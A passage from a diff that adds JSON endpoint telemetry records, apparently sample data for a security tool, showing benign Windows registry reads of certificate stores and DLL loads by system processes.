"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mssph.dll", + "image_path": "C:\\Windows\\System32\\mssph.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager", + "registry_value": "SyncRootManager", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "authz.dll", + "image_path": "C:\\Windows\\System32\\authz.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 